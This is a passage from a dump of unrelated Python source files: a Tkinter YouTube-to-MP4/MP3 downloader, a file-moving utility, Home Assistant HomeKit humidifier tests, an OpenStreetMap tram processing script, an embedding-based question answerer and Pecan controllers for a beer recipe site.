bg='red',\n\t\t\t\t\tfg='white')\n\t\tself.duration.grid(row=2, column=0, padx=1, pady=1)\n\n\t\tself.published = tk.Label(self.info_frame, width=20, height=2, bg='red',\n\t\t\t\t\tfg='white')\n\t\tself.published.grid(row=3, column=0, padx=1, pady=1)\n\n\t\t# self.video_frame\n\n\t\tself.video_quality.set(self.option_streams[0])\n\t\tself.options = tk.OptionMenu(self.video_frame, self.video_quality,\n\t\t\t\t\t\t*self.option_streams)\n\t\tself.options.config(bg='red', fg='white')\n\t\tself.options['menu'].config(bg='red', fg='white')\n\t\tself.options.grid(row=0, column=0, padx=50, pady=20, columnspan=5)\n\n\t\tself.video_dwn = tk.Button(self.video_frame, text='Download MP4',\n\t\t\t\t\t\t\tcommand=self.download_video, bg='red', fg='white',\n\t\t\t\t\t\t\twidth=15, cursor='hand2')\n\t\tself.video_dwn.grid(row=1, column=0, padx=50, pady=10, columnspan=5)\n\n\t\t# self.audio_frame\n\n\t\tself.audio_dwn = tk.Button(self.audio_frame, text='Download MP3',\n\t\t\t\t\t\t\tcommand=self.download_mp3, bg='red', fg='white',\n\t\t\t\t\t\t\twidth=15, cursor='hand2')\n\t\tself.audio_dwn.grid(row=0, column=0, padx=20, pady=20)\n\n\t\t# self.back_frame\n\t\tself.back = tk.Button(self.back_frame, text='back', image=back_icon,\n\t\t\t\t\t\t\tcommand=self.go_back, relief=tk.FLAT)\n\t\tself.back.grid(row=0, column=0, pady=10, padx=10)\n\n\tdef cease_buttons(self):\n\t\tif self.is_video_downloading:\n\t\t\tself.video_dwn['text'] = 'downloading'\n\t\tif self.is_audio_downloading:\n\t\t\tself.audio_dwn['text'] = 'downloading'\n\t\tself.video_dwn.config(state='disabled')\n\t\tself.audio_dwn.config(state='disabled')\n\n\tdef release_buttons(self):\n\t\tself.video_dwn.config(state='normal')\n\t\tself.audio_dwn.config(state='normal')\n\t\tif not self.is_video_downloading:\n\t\t\tself.video_dwn['text'] = 'Download MP4'\n\t\tif not self.is_audio_downloading:\n\t\t\tself.audio_dwn['text'] = 'Download MP3'\n\n\tdef search_video(self, event=None):\n\t\tself.url = self.entry.get()\n\t\tself.master.focus_set()\n\t\t\n\t\tif self.url and ' ' not in self.url:\n\t\t\ttry:\n\t\t\t\tvideo = pafy.new(self.url)\n\t\t\t\tself.video_title = video.title\n\t\t\t\tduration = video.duration\n\t\t\t\tviews = video.viewcount\n\t\t\t\tpublished = video.published\n\t\t\t\tthumbnail = video.thumb\n\t\t\t\tself.streams = video.streams\n\t\t\t\tself.option_streams = 
self.streams[::-1]\n\n\t\t\t\tself.draw_download_frame()\n\t\t\t\tself.draw_download_widgets()\n\n\t\t\t\tself.title['text'] = self.video_title[:50]\n\t\t\t\tself.views['text'] = f'Views : {views:,}'\n\t\t\t\tself.duration['text'] = f'Length : {duration}'\n\t\t\t\tself.published['text'] = f'Pub : {published[:10]}'\n\t\t\texcept OSError:\n\t\t\t\tmessagebox.showerror('SaveFromYT', 'Cannot extract data')\n\t\t\texcept ValueError:\n\t\t\t\tmessagebox.showerror('SaveFromYT', 'Invalid URL')\n\t\t\texcept:\n\t\t\t\tmessagebox.showerror('SaveFromYT', 'Cannot connect with internet')\n\n\tdef download_video(self):\n\t\tfiletypes = [('MP4', '.mp4')]\n\t\tfilepath = filedialog.asksaveasfilename(initialdir=cwd, \n\t\t\t\t\t\tinitialfile=self.video_title[:25]+'.mp4',\n\t\t\t\t\t\tfiletypes=filetypes)\n\t\tif filepath:\n\t\t\tself.is_video_downloading = True\n\t\t\tself.cease_buttons()\n\t\t\tvq = self.video_quality.get()\n\t\t\tl = len(self.streams)\n\t\t\topts = [str(stream) for stream in self.option_streams]\n\t\t\tstream = self.streams[opts.index(vq) - l + 1]\n\t\t\tself.filesize = stream.get_filesize()\n\n\t\t\tself.sizelabel = tk.Label(self.video_frame, bg='red', fg='white',\n\t\t\t\t\t\t\ttext=f'Filesize : {self.filesize/(1024*1024):.2f} Mb')\n\t\t\tself.sizelabel.grid(row=2, column=0, pady=5)\n\t\t\tself.pb = ttk.Progressbar(self.video_frame, orient=tk.HORIZONTAL, \n\t\t\t\t\t\t\tmode='determinate', length=100)\n\t\t\tself.pb.grid(row=2, column=2, columnspan=3, pady=5)\n\n\t\t\ttry:\n\t\t\t\tstream.download(quiet=True, callback=self.download_callback,\n\t\t\t\t\t\t\t\tfilepath=filepath)\n\t\t\t\tmessagebox.showinfo('SaveFromYT', 'Video Downloaded Successfully')\n\t\t\texcept:\n\t\t\t\tmessagebox.showerror('SaveFromYT', 'Cannot connect with internet')\n\t\t\t\n\t\t\tself.pb.destroy()\n\t\t\tself.sizelabel.destroy()\n\t\t\tself.is_video_downloading = False\n\t\t\tself.release_buttons()\n\t\t\t\n\n\tdef download_callback(self, total, recvd, ratio, rate, eta):\n\t\tperc = (recvd / total) * 100\n\t\tself.pb['value'] = int(perc)\n\t\tself.update()\n\n\tdef download_mp3(self):\n\t\tfiletypes = ['MP3', '.mp3']\n\t\tfilepath = filedialog.asksaveasfilename(initialdir=cwd, \n\t\t\t\t\t\tinitialfile=''.join(self.video_title[:25]+'.mp3'))\n\t\tif filepath:\n\t\t\tydl_opts = {\n\t\t\t\t'format': 'bestaudio/best',\n\t\t\t\t'outtmpl' : filepath,\n\t\t\t\t'postprocessors': [{\n\t\t\t\t\t'key': 'FFmpegExtractAudio',\n\t\t\t\t\t'preferredcodec': 'mp3',\n\t\t\t\t\t'preferredquality': '192'\n\t\t\t\t}],\n\t\t\t\t'postprocessor_args': [\n\t\t\t\t\t'-ar', '16000'\n\t\t\t\t],\n\t\t\t\t'prefer_ffmpeg': True,\n\t\t\t\t'keepvideo': True,\n\t\t\t\t'progress_hooks': [self.download_hook]\n\t\t\t}\n\n\t\t\tself.is_audio_downloading = True\n\t\t\tself.cease_buttons()\n\n\t\t\ttry:\n\t\t\t\tself.pb = ttk.Progressbar(self.audio_frame, orient=tk.HORIZONTAL, \n\t\t\t\t\t\t\tmode='determinate', length=100)\n\t\t\t\tself.pb.grid(row=0, column=2, pady=20, padx=20)\n\n\t\t\t\twith youtube_dl.YoutubeDL(ydl_opts) as ydl:\n\t\t\t\t\tydl.download([self.url])\n\n\t\t\t\tfor file in os.listdir():\n\t\t\t\t\tif file.endswith('.webm'):\n\t\t\t\t\t\tos.remove(file)\n\n\t\t\t\tself.pb.destroy()\n\t\t\t\tmessagebox.showinfo('SaveFromYT', 'Successfully Downloaded Mp3')\n\t\t\texcept:\n\t\t\t\tmessagebox.showinfo('SaveFromYT', \"Can't connect with internet\")\n\n\t\t\tself.is_audio_downloading = False\n\t\t\tself.release_buttons()\n\n\tdef download_hook(self, d):\n\t\tif d['status'] == 'downloading':\n\t\t\tp = d['_percent_str']\n\t\t\tp = 
float(p.replace('%','').replace(' ',''))\n\t\t\tself.pb['value'] = round(p)\n\t\t\tself.update()\n\n\tdef go_back(self):\n\t\tself.info_frame.destroy()\n\t\tself.video_frame.destroy()\n\t\tself.audio_frame.destroy()\n\t\tself.back_frame.destroy()\n\n\t\tself.draw_main_frame()\n\nif __name__ == '__main__':\n\troot = tk.Tk()\n\troot.geometry('450x320')\n\troot.title('SaveFromYT')\n\troot.resizable(0,0)\n\n\tyoutube_icon = PhotoImage(file='icons/youtube.png')\n\tback_icon = PhotoImage(file='icons/back.png')\n\tsearch_icon = PhotoImage(file='icons/search.png')\n\n\tapp = Application(master=root)\n\tapp.mainloop()"} {"ext": "py", "sha": "1a301db2a25fe29e7e0a916e2b7cd125cbe4262e", "content": "#!/usr/bin/env python\nimport glob\nimport os\nimport sys\nimport time\nimport re\nimport shutil\nfrom os.path import expanduser\nhome = expanduser(\"~\")\nrosey_dir = home + \"/.rosey/\"\nrosey_config = rosey_dir + \"config\"\nrosey_log = rosey_dir + \"rosey.log\"\n\nclass Rosey():\n\n def __init__(self, config):\n \"\"\"Configs come one in a list of three member lists\"\"\"\n \"\"\"glob-file-pattern-to-match, prefix to remove, directory-to-move-matched-files\"\"\"\n self.config = config\n\n def FileMoveToDoList(self):\n files = []\n todos = []\n configs = iter(self.config)\n for config in configs:\n files = self.findMatchingFiles(config[0])\n for f in files:\n todos += [\n [f, self.replacePatternWithNewPath(f, config[1], config[2])]\n ]\n\n return todos\n\n def replacePatternWithNewPath(self, file, remove_this, dest_path):\n t = time.localtime(os.path.getctime(file))\n timestamp = time.strftime(\"%Y-%m-%d\", t) + \"-\"\n orig_name = os.path.basename(file)\n trimmed_name = orig_name.replace(remove_this, \"\")\n no_spaces_name = trimmed_name.replace(\" \", \"-\")\n timestamped_name = timestamp + no_spaces_name\n new_name = re.sub(\"-+\", \"-\", timestamped_name)\n new_path = dest_path + new_name\n return new_path\n\n def findMatchingFiles(self, glob_spec):\n all = glob.glob(glob_spec)\n return all\n\n\ndef check_config(config):\n findings = []\n regexes = [f[0] for f in config]\n if (regexes.sort() != list(set(regexes)).sort()):\n findings += \"You have one or more duplicate patterns\"\n return\n\n dest_dirs = [f[2] for f in config]\n for dest in dest_dirs:\n if (not os.path.isdir(dest)):\n findings += \"Destination directory does not exist: '{0}'\".format(dest)\n\n return findings\n\ndef cleanup_config(config):\n config_list = [line.rstrip().split(',') for line in config]\n trimmed_config = []\n for config_item in config_list:\n trimmed_config += [[f.lstrip().rstrip() for f in config_item]]\n\n return trimmed_config\n\ndef moveEm(todo, really_move = True):\n\n with open(rosey_log, \"a\") as myfile:\n for t in todo:\n message = \"Moving: {0}\\n to: {1}\\n\".format(t[0], t[1])\n\n if really_move:\n try:\n shutil.move(t[0], t[1])\n message += \" : Move Successful\"\n except Exception as e:\n message += \" : Move Fails {0}.\".format(e)\n\n myfile.write(message + \"\\n\");\n print message\n\ndef show_findings(findings):\n for f in findings:\n print f\n\ndef main(arg):\n\n if (not os.path.exists(rosey_config)):\n print \"You need to create ~/.rosey/config\"\n exit(1)\n\n with open(rosey_config) as f:\n config = f.readlines()\n\n clean_config = cleanup_config(config)\n findings = check_config(clean_config)\n if findings != []:\n show_findings(findings)\n exit(1)\n rosey = Rosey(clean_config)\n todo = rosey.FileMoveToDoList()\n if arg == \"move\":\n moveEm(todo)\n if arg == \"show\":\n moveEm(todo, False)\n\nif 
__name__ == '__main__':\n if len(sys.argv) != 2:\n print \"usage: {0} [move, show] {1}\".format(sys.argv[0], len(sys.argv))\n exit(0)\n main(sys.argv[1]) # Run the example\n\n"} {"ext": "py", "sha": "1a301e340b3e8aa8123ecd2dee29023be07ec43e", "content": "\"\"\"Test different accessory types: HumidifierDehumidifier.\"\"\"\nfrom pyhap.const import (\n CATEGORY_HUMIDIFIER,\n HAP_REPR_AID,\n HAP_REPR_CHARS,\n HAP_REPR_IID,\n HAP_REPR_VALUE,\n)\n\nfrom homeassistant.components.homekit.const import (\n ATTR_VALUE,\n CONF_LINKED_HUMIDITY_SENSOR,\n PROP_MAX_VALUE,\n PROP_MIN_STEP,\n PROP_MIN_VALUE,\n PROP_VALID_VALUES,\n)\nfrom homeassistant.components.homekit.type_humidifiers import HumidifierDehumidifier\nfrom homeassistant.components.humidifier.const import (\n ATTR_HUMIDITY,\n ATTR_MAX_HUMIDITY,\n ATTR_MIN_HUMIDITY,\n DEFAULT_MAX_HUMIDITY,\n DEFAULT_MIN_HUMIDITY,\n DEVICE_CLASS_DEHUMIDIFIER,\n DEVICE_CLASS_HUMIDIFIER,\n DOMAIN,\n SERVICE_SET_HUMIDITY,\n)\nfrom homeassistant.const import (\n ATTR_DEVICE_CLASS,\n ATTR_ENTITY_ID,\n ATTR_UNIT_OF_MEASUREMENT,\n DEVICE_CLASS_HUMIDITY,\n PERCENTAGE,\n SERVICE_TURN_OFF,\n SERVICE_TURN_ON,\n STATE_OFF,\n STATE_ON,\n STATE_UNAVAILABLE,\n)\n\nfrom tests.common import async_mock_service\n\n\nasync def test_humidifier(hass, hk_driver, events):\n \"\"\"Test if humidifier accessory and HA are updated accordingly.\"\"\"\n entity_id = \"humidifier.test\"\n\n hass.states.async_set(entity_id, STATE_OFF)\n await hass.async_block_till_done()\n acc = HumidifierDehumidifier(\n hass, hk_driver, \"HumidifierDehumidifier\", entity_id, 1, None\n )\n hk_driver.add_accessory(acc)\n\n await acc.run()\n await hass.async_block_till_done()\n\n assert acc.aid == 1\n assert acc.category == CATEGORY_HUMIDIFIER\n\n assert acc.char_current_humidifier_dehumidifier.value == 0\n assert acc.char_target_humidifier_dehumidifier.value == 1\n assert acc.char_current_humidity.value == 0\n assert acc.char_target_humidity.value == 45.0\n assert acc.char_active.value == 0\n\n assert acc.char_target_humidity.properties[PROP_MAX_VALUE] == DEFAULT_MAX_HUMIDITY\n assert acc.char_target_humidity.properties[PROP_MIN_VALUE] == DEFAULT_MIN_HUMIDITY\n assert acc.char_target_humidity.properties[PROP_MIN_STEP] == 1.0\n assert acc.char_target_humidifier_dehumidifier.properties[PROP_VALID_VALUES] == {\n \"Humidifier\": 1\n }\n\n hass.states.async_set(\n entity_id,\n STATE_ON,\n {ATTR_HUMIDITY: 47},\n )\n await hass.async_block_till_done()\n assert acc.char_target_humidity.value == 47.0\n assert acc.char_current_humidifier_dehumidifier.value == 2\n assert acc.char_target_humidifier_dehumidifier.value == 1\n assert acc.char_active.value == 1\n\n hass.states.async_set(\n entity_id,\n STATE_OFF,\n {ATTR_HUMIDITY: 42, ATTR_DEVICE_CLASS: DEVICE_CLASS_HUMIDIFIER},\n )\n await hass.async_block_till_done()\n assert acc.char_target_humidity.value == 42.0\n assert acc.char_current_humidifier_dehumidifier.value == 0\n assert acc.char_target_humidifier_dehumidifier.value == 1\n assert acc.char_active.value == 0\n\n # Set from HomeKit\n call_set_humidity = async_mock_service(hass, DOMAIN, SERVICE_SET_HUMIDITY)\n\n char_target_humidity_iid = acc.char_target_humidity.to_HAP()[HAP_REPR_IID]\n\n hk_driver.set_characteristics(\n {\n HAP_REPR_CHARS: [\n {\n HAP_REPR_AID: acc.aid,\n HAP_REPR_IID: char_target_humidity_iid,\n HAP_REPR_VALUE: 39.0,\n },\n ]\n },\n \"mock_addr\",\n )\n\n await hass.async_block_till_done()\n assert len(call_set_humidity) == 1\n assert call_set_humidity[0].data[ATTR_ENTITY_ID] == entity_id\n assert 
call_set_humidity[0].data[ATTR_HUMIDITY] == 39.0\n assert acc.char_target_humidity.value == 39.0\n assert len(events) == 1\n assert events[-1].data[ATTR_VALUE] == \"RelativeHumidityHumidifierThreshold to 39.0%\"\n\n\nasync def test_dehumidifier(hass, hk_driver, events):\n \"\"\"Test if dehumidifier accessory and HA are updated accordingly.\"\"\"\n entity_id = \"humidifier.test\"\n\n hass.states.async_set(\n entity_id, STATE_OFF, {ATTR_DEVICE_CLASS: DEVICE_CLASS_DEHUMIDIFIER}\n )\n await hass.async_block_till_done()\n acc = HumidifierDehumidifier(\n hass, hk_driver, \"HumidifierDehumidifier\", entity_id, 1, None\n )\n hk_driver.add_accessory(acc)\n\n await acc.run()\n await hass.async_block_till_done()\n\n assert acc.aid == 1\n assert acc.category == CATEGORY_HUMIDIFIER\n\n assert acc.char_current_humidifier_dehumidifier.value == 0\n assert acc.char_target_humidifier_dehumidifier.value == 2\n assert acc.char_current_humidity.value == 0\n assert acc.char_target_humidity.value == 45.0\n assert acc.char_active.value == 0\n\n assert acc.char_target_humidity.properties[PROP_MAX_VALUE] == DEFAULT_MAX_HUMIDITY\n assert acc.char_target_humidity.properties[PROP_MIN_VALUE] == DEFAULT_MIN_HUMIDITY\n assert acc.char_target_humidity.properties[PROP_MIN_STEP] == 1.0\n assert acc.char_target_humidifier_dehumidifier.properties[PROP_VALID_VALUES] == {\n \"Dehumidifier\": 2\n }\n\n hass.states.async_set(\n entity_id,\n STATE_ON,\n {ATTR_HUMIDITY: 30},\n )\n await hass.async_block_till_done()\n assert acc.char_target_humidity.value == 30.0\n assert acc.char_current_humidifier_dehumidifier.value == 3\n assert acc.char_target_humidifier_dehumidifier.value == 2\n assert acc.char_active.value == 1\n\n hass.states.async_set(\n entity_id,\n STATE_OFF,\n {ATTR_HUMIDITY: 42},\n )\n await hass.async_block_till_done()\n assert acc.char_target_humidity.value == 42.0\n assert acc.char_current_humidifier_dehumidifier.value == 0\n assert acc.char_target_humidifier_dehumidifier.value == 2\n assert acc.char_active.value == 0\n\n # Set from HomeKit\n call_set_humidity = async_mock_service(hass, DOMAIN, SERVICE_SET_HUMIDITY)\n\n char_target_humidity_iid = acc.char_target_humidity.to_HAP()[HAP_REPR_IID]\n\n hk_driver.set_characteristics(\n {\n HAP_REPR_CHARS: [\n {\n HAP_REPR_AID: acc.aid,\n HAP_REPR_IID: char_target_humidity_iid,\n HAP_REPR_VALUE: 39.0,\n },\n ]\n },\n \"mock_addr\",\n )\n\n await hass.async_block_till_done()\n assert len(call_set_humidity) == 1\n assert call_set_humidity[0].data[ATTR_ENTITY_ID] == entity_id\n assert call_set_humidity[0].data[ATTR_HUMIDITY] == 39.0\n assert acc.char_target_humidity.value == 39.0\n assert len(events) == 1\n assert (\n events[-1].data[ATTR_VALUE] == \"RelativeHumidityDehumidifierThreshold to 39.0%\"\n )\n\n\nasync def test_hygrostat_power_state(hass, hk_driver, events):\n \"\"\"Test if accessory and HA are updated accordingly.\"\"\"\n entity_id = \"humidifier.test\"\n\n hass.states.async_set(\n entity_id,\n STATE_ON,\n {ATTR_HUMIDITY: 43},\n )\n await hass.async_block_till_done()\n acc = HumidifierDehumidifier(\n hass, hk_driver, \"HumidifierDehumidifier\", entity_id, 1, None\n )\n hk_driver.add_accessory(acc)\n\n await acc.run()\n await hass.async_block_till_done()\n\n assert acc.char_current_humidifier_dehumidifier.value == 2\n assert acc.char_target_humidifier_dehumidifier.value == 1\n assert acc.char_active.value == 1\n\n hass.states.async_set(\n entity_id,\n STATE_OFF,\n {ATTR_HUMIDITY: 43},\n )\n await hass.async_block_till_done()\n assert 
acc.char_current_humidifier_dehumidifier.value == 0\n assert acc.char_target_humidifier_dehumidifier.value == 1\n assert acc.char_active.value == 0\n\n # Set from HomeKit\n call_turn_on = async_mock_service(hass, DOMAIN, SERVICE_TURN_ON)\n\n char_active_iid = acc.char_active.to_HAP()[HAP_REPR_IID]\n\n hk_driver.set_characteristics(\n {\n HAP_REPR_CHARS: [\n {\n HAP_REPR_AID: acc.aid,\n HAP_REPR_IID: char_active_iid,\n HAP_REPR_VALUE: 1,\n },\n ]\n },\n \"mock_addr\",\n )\n\n await hass.async_block_till_done()\n assert len(call_turn_on) == 1\n assert call_turn_on[0].data[ATTR_ENTITY_ID] == entity_id\n assert acc.char_active.value == 1\n assert len(events) == 1\n assert events[-1].data[ATTR_VALUE] == \"Active to 1\"\n\n call_turn_off = async_mock_service(hass, DOMAIN, SERVICE_TURN_OFF)\n\n hk_driver.set_characteristics(\n {\n HAP_REPR_CHARS: [\n {\n HAP_REPR_AID: acc.aid,\n HAP_REPR_IID: char_active_iid,\n HAP_REPR_VALUE: 0,\n },\n ]\n },\n \"mock_addr\",\n )\n\n await hass.async_block_till_done()\n assert len(call_turn_off) == 1\n assert call_turn_off[0].data[ATTR_ENTITY_ID] == entity_id\n assert acc.char_active.value == 0\n assert len(events) == 2\n assert events[-1].data[ATTR_VALUE] == \"Active to 0\"\n\n\nasync def test_hygrostat_get_humidity_range(hass, hk_driver):\n \"\"\"Test if humidity range is evaluated correctly.\"\"\"\n entity_id = \"humidifier.test\"\n\n hass.states.async_set(\n entity_id, STATE_OFF, {ATTR_MIN_HUMIDITY: 40, ATTR_MAX_HUMIDITY: 45}\n )\n await hass.async_block_till_done()\n acc = HumidifierDehumidifier(\n hass, hk_driver, \"HumidifierDehumidifier\", entity_id, 1, None\n )\n hk_driver.add_accessory(acc)\n\n await acc.run()\n await hass.async_block_till_done()\n\n assert acc.char_target_humidity.properties[PROP_MAX_VALUE] == 45\n assert acc.char_target_humidity.properties[PROP_MIN_VALUE] == 40\n\n\nasync def test_humidifier_with_linked_humidity_sensor(hass, hk_driver):\n \"\"\"Test a humidifier with a linked humidity sensor can update.\"\"\"\n humidity_sensor_entity_id = \"sensor.bedroom_humidity\"\n\n hass.states.async_set(\n humidity_sensor_entity_id,\n \"42.0\",\n {\n ATTR_DEVICE_CLASS: DEVICE_CLASS_HUMIDITY,\n ATTR_UNIT_OF_MEASUREMENT: PERCENTAGE,\n },\n )\n await hass.async_block_till_done()\n entity_id = \"humidifier.test\"\n\n hass.states.async_set(entity_id, STATE_OFF)\n await hass.async_block_till_done()\n acc = HumidifierDehumidifier(\n hass,\n hk_driver,\n \"HumidifierDehumidifier\",\n entity_id,\n 1,\n {CONF_LINKED_HUMIDITY_SENSOR: humidity_sensor_entity_id},\n )\n hk_driver.add_accessory(acc)\n\n await acc.run()\n await hass.async_block_till_done()\n\n assert acc.char_current_humidity.value == 42.0\n\n hass.states.async_set(\n humidity_sensor_entity_id,\n \"43.0\",\n {\n ATTR_DEVICE_CLASS: DEVICE_CLASS_HUMIDITY,\n ATTR_UNIT_OF_MEASUREMENT: PERCENTAGE,\n },\n )\n await hass.async_block_till_done()\n\n assert acc.char_current_humidity.value == 43.0\n\n hass.states.async_set(\n humidity_sensor_entity_id,\n STATE_UNAVAILABLE,\n {\n ATTR_DEVICE_CLASS: DEVICE_CLASS_HUMIDITY,\n ATTR_UNIT_OF_MEASUREMENT: PERCENTAGE,\n },\n )\n await hass.async_block_till_done()\n\n assert acc.char_current_humidity.value == 43.0\n\n hass.states.async_remove(humidity_sensor_entity_id)\n await hass.async_block_till_done()\n\n assert acc.char_current_humidity.value == 43.0\n\n\nasync def test_humidifier_with_a_missing_linked_humidity_sensor(hass, hk_driver):\n \"\"\"Test a humidifier with a configured linked motion sensor that is missing.\"\"\"\n humidity_sensor_entity_id = 
\"sensor.bedroom_humidity\"\n entity_id = \"humidifier.test\"\n\n hass.states.async_set(entity_id, STATE_OFF)\n await hass.async_block_till_done()\n acc = HumidifierDehumidifier(\n hass,\n hk_driver,\n \"HumidifierDehumidifier\",\n entity_id,\n 1,\n {CONF_LINKED_HUMIDITY_SENSOR: humidity_sensor_entity_id},\n )\n hk_driver.add_accessory(acc)\n\n await acc.run()\n await hass.async_block_till_done()\n\n assert acc.char_current_humidity.value == 0\n\n\nasync def test_humidifier_as_dehumidifier(hass, hk_driver, events, caplog):\n \"\"\"Test an invalid char_target_humidifier_dehumidifier from HomeKit.\"\"\"\n entity_id = \"humidifier.test\"\n\n hass.states.async_set(entity_id, STATE_OFF)\n await hass.async_block_till_done()\n acc = HumidifierDehumidifier(\n hass, hk_driver, \"HumidifierDehumidifier\", entity_id, 1, None\n )\n hk_driver.add_accessory(acc)\n\n await acc.run()\n await hass.async_block_till_done()\n\n assert acc.char_target_humidifier_dehumidifier.value == 1\n\n # Set from HomeKit\n char_target_humidifier_dehumidifier_iid = (\n acc.char_target_humidifier_dehumidifier.to_HAP()[HAP_REPR_IID]\n )\n\n hk_driver.set_characteristics(\n {\n HAP_REPR_CHARS: [\n {\n HAP_REPR_AID: acc.aid,\n HAP_REPR_IID: char_target_humidifier_dehumidifier_iid,\n HAP_REPR_VALUE: 0,\n },\n ]\n },\n \"mock_addr\",\n )\n\n await hass.async_block_till_done()\n assert \"TargetHumidifierDehumidifierState is not supported\" in caplog.text\n assert len(events) == 0\n"} {"ext": "py", "sha": "1a301e3a89ed6eb0361d8d6bfa049bf53d80761e", "content": "#!/usr/bin/python\n# -*- coding: utf8 -*-\n\nimport os\nimport logging\n\nimport sys\nimport argparse\nsys.path.append(\"../core\")\nfrom qgis_project_substitute import substitute_project\n\nfrom processor import Processor\n\n\ndef argparser_prepare():\n\n class PrettyFormatter(argparse.ArgumentDefaultsHelpFormatter,\n argparse.RawDescriptionHelpFormatter):\n\n max_help_position = 35\n\n parser = argparse.ArgumentParser(description='OSMTram process',\n formatter_class=PrettyFormatter)\n parser.add_argument('--prune',dest='prune', required=False, action='store_true', help='Clear temporary folder')\n parser.add_argument('--skip-osmupdate',dest='skip_osmupdate', required=False, action='store_true')\n parser.add_argument('--workdir',dest='WORKDIR', required=True)\n\n parser.epilog = \\\n '''Samples:\n%(prog)s\n\n''' \\\n % {'prog': parser.prog}\n return parser\n\ndump_url = 'http://download.geofabrik.de/europe/latvia-latest.osm.pbf'\n\nparser = argparser_prepare()\nargs = parser.parse_args()\n\nWORKDIR=args.WORKDIR\n\nlogging.basicConfig(level=logging.DEBUG,format='%(asctime)s %(levelname)-8s %(message)s',datefmt='%Y-%m-%d %H:%M:%S')\nlogger = logging.getLogger(__name__)\n\nlogger.info('Start')\n\nprocessor = Processor()\n\nprocessor.process_sheets('latvia.geojson',WORKDIR,dump_url,dump_name='latvia')\n\n#,attribute_filter='''\"name_ru\"= 'Лиепая' and \"type\"='tram' '''\n\n"} {"ext": "py", "sha": "1a301e9b700cc4f1eb12f4e8395c89aa84d99dfa", "content": "import numpy as np\n\nfrom src.util import Util, Article\n\n\nclass Answer:\n \"\"\"Answer questions based on the initialized article.\"\"\"\n\n def __init__(self, article):\n \"\"\"\n Create a new instance of the Answer class.\n\n Args:\n article: An instance of the Article class\n \"\"\"\n self.article = article\n\n def answer(self, question, return_score=False):\n \"\"\"\n Answer the given question.\n\n Args:\n question: Question string\n\n Returns:\n Answer to question as string\n \"\"\"\n u = Util()\n question_embedding = 
u.embeddings([question])[0]\n\n sentences_list = []\n\n for paragraph in self.article.sentences:\n paragraph_text = [s.text for s in paragraph]\n sentences_list += paragraph_text\n\n sentences_embeddings = u.embeddings(sentences_list)\n\n distances = []\n for i, embedding in enumerate(sentences_embeddings):\n diffs = np.inner(question_embedding, embedding)\n dist = diffs\n\n distances.append((dist, sentences_list[i]))\n\n distances.sort(key=lambda x: x[0], reverse=True)\n\n most_similar_sentence = distances[0][1]\n most_similar_score = distances[0][0]\n\n if return_score:\n return (most_similar_sentence, most_similar_score)\n\n return most_similar_sentence\n\n\nif __name__ == \"__main__\":\n u = Util()\n art = Article(u.load_txt_article(\"../articles/Development_data/set4/set4/a1.txt\"))\n a = Answer(art)\n q = \"Who studied the stars of the southern hemisphere from 1750 until 1754 from Cape of Good Hope?\"\n print(a.answer(q))\n\n# Who is a product of a revision of the Old Babylonian system in later Neo-Babylonian astronomy 6th century BC?\n# Who interpreted the creatures appearing in the books of Ezekiel (and thence in Revelation) as the middle signs of the four quarters of the Zodiac?\n# Who studied the stars of the southern hemisphere from 1750 until 1754 from Cape of Good Hope?\n# Who aided the IAU (International Astronomical Union) in dividing the celestial sphere into 88 official constellations?\n# Who is a product of a revision of the Old Babylonian system in later Neo-Babylonian astronomy 6th century BC?\n"} {"ext": "py", "sha": "1a301f062ea2131e6769a035818f1cba3b2d8e5b", "content": "from math import ceil\nfrom hashlib import md5\n\nfrom pecan import expose, request, abort, response, redirect\nfrom pecan.secure import secure\nfrom pecan.ext.wtforms import with_form\nfrom sqlalchemy import select, and_, or_, asc, desc, func, case, literal\n\nfrom draughtcraft import model\nfrom draughtcraft.lib.beerxml import export\nfrom draughtcraft.lib.forms.recipes.browse import RecipeSearchForm\nfrom create import RecipeCreationController\nfrom builder import RecipeBuilderController\n\n\nclass SlugController(object):\n\n def __init__(self, slug):\n self.slug = slug\n\n # Make sure the provided slug is valid\n if not slug:\n redirect(request.context['recipe'].slugs[0].slug)\n\n if slug not in [slug.slug for slug in request.context['recipe'].slugs]:\n abort(404)\n\n @expose('recipes/builder/index.html')\n @expose('json', content_type='application/json')\n def index(self):\n recipe = request.context['recipe']\n if recipe.state == \"DRAFT\":\n if recipe.author and recipe.author != request.context['user']:\n abort(404)\n if not recipe.author and recipe != request.context['trial_recipe']:\n abort(404)\n\n # Log a view for the recipe (if the viewer *is not* the author)\n if recipe.author != request.context['user'] and \\\n request.pecan.get('content_type') == 'application/json':\n model.RecipeView(recipe=recipe)\n\n return dict(\n recipe=recipe,\n editable=False\n )\n\n @expose(content_type='application/xml')\n def xml(self):\n recipe = request.context['recipe']\n if recipe.state == \"DRAFT\":\n if recipe.author and recipe.author != request.context['user']:\n abort(404)\n\n response.headers['Content-Disposition'] = \\\n 'attachment; filename=\"%s.xml\"' % self.slug\n return export.to_xml([request.context['recipe']])\n\n @expose(generic=True)\n def draft(self):\n abort(405)\n\n @draft.when(method=\"POST\")\n def do_draft(self):\n source = request.context['recipe']\n if source.author is None or 
source.author != request.context['user']:\n abort(401)\n if source.state != \"PUBLISHED\":\n abort(401)\n\n draft = source.draft()\n draft.flush()\n redirect(\"%sbuilder\" % draft.url())\n\n @expose(generic=True)\n def copy(self):\n abort(405)\n\n @copy.when(method=\"POST\")\n def do_copy(self):\n source = request.context['recipe']\n if request.context['user'] is None:\n redirect(\"/signup\")\n if source.author is None:\n abort(401)\n\n diff_user = source.author != request.context['user']\n\n name = source.name if diff_user else \"%s (Duplicate)\" % source.name\n copy = source.duplicate({\n 'name': name,\n 'author': request.context['user']\n })\n\n if diff_user:\n copy.copied_from = source\n\n redirect(\"/\")\n\n @expose(generic=True)\n def delete(self):\n abort(405)\n\n @delete.when(method=\"POST\")\n def do_delete(self):\n source = request.context['recipe']\n if source.author is None or source.author != request.context['user']:\n abort(401)\n\n source.delete()\n redirect(\"/\")\n\n builder = secure(\n RecipeBuilderController(),\n RecipeBuilderController.check_permissions\n )\n\n\nclass RecipeController(object):\n\n @expose()\n def _lookup(self, slug, *remainder):\n return SlugController(slug), remainder\n\n def __init__(self, recipeID):\n try:\n primary_key = int(str(recipeID), 16)\n except ValueError:\n abort(404)\n recipe = model.Recipe.get(primary_key)\n if recipe is None:\n abort(404)\n\n request.context['recipe'] = recipe\n\n\nclass RecipesController(object):\n\n @expose()\n def _lookup(self, recipeID, *remainder):\n return RecipeController(recipeID), remainder\n\n @expose('recipes/browse/index.html')\n def index(self):\n return dict(\n styles=model.Style.query.order_by(model.Style.name).all()\n )\n\n 